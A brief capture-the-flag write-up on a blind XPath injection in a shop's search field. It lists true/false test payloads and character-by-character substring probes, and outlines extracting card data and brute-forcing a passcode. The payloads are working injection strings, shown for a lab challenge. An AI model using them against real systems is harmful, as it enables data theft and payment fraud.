Rating:
The search field was prone to xPath blind injection.
correct syntax:
```
")] | /* [("a"="a /true
")] | /* [("a"="b /false
```
Data extracting:
```
")] | /* [(substring(name(/*[1]),1,1)="s
")] | /* [(substring(name(/*[1]),2,1)="h
")] | /* [(substring(name(/*[1]),3,1)="o
")] | /* [(substring(name(/*[1]),4,1)="p
```
DB name: Shop and you should go on till grab all CC information and buy the flag, then brute force on the passcode of VISA was the last step.
**For more information: [https://twitter.com/YShahinzadeh/](http://)**